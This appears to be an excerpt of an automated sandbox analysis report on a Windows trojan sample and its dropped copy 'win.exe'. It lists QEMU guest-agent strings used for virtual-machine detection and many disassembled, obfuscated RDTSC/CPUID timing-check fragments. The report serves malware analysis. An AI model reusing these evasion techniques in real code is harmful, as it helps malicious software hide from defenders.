            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
            Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B8640 second address: 00000000020B8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C37BB12h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B4EE7 second address: 00000000020B4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C37BB12h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C8016E2h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C801BD8h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C8016E2h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C8016E2h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C37BB40h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C37BE0Ch 0x00000042 jmp 00007F430C37BB16h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C8016AAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B8640 second address: 00000000020B8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A8640 second address: 00000000007A8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9ACC second address: 00000000007A9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A900A second address: 00000000007A9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9059 second address: 00000000007A9059 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A9138 second address: 00000000007A9138 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A5970 second address: 00000000007A5970 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A7FD6 second address: 00000000007A7FD6 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A47AA second address: 00000000007A7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C8016E6h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C8016E2h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C804ADEh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A5549 second address: 00000000007A5549 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A4EE7 second address: 00000000007A4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C8016E2h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B4EE7 second address: 00000000020B4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C8016E2h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A53C5 second address: 00000000007A53C5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000007A57E9 second address: 00000000007A57E9 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C8016E2h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C801BD8h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C8016E2h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C8016E2h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
